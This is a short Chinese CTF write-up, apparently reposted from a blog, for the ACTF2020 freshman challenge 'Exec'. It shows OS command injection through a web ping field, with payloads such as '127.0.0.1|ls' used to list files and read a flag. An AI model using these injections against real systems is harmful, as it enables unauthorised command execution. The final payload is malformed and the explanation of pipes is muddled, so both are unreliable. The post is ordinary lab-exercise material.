码迷,mamicode.com
首页 > 其他好文 > 详细

ACTF2020新生赛-Exec

时间:2021-03-08 13:10:12      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:ctf   注意   str   dex   ping   ima   class   命令   img   

打开靶机
随便ping一下

技术图片

 

使用命令管道符 | 列出文件

127.0.0.1|ls

技术图片

 

只有一个index.php文件,查看一下目录(居然没过滤!)

 

127.0.0.1||ls /

 

技术图片

 

直接拿走flag就是了

127.0.0.1||ls /cat /flag                                 //注意空格

 

技术图片

 

知识点:
管道符的使用:
连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,也就是返回上一级
一定注意空格!!

 

ACTF2020新生赛-Exec

标签:ctf   注意   str   dex   ping   ima   class   命令   img   

原文地址:https://www.cnblogs.com/forchan/p/14491111.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!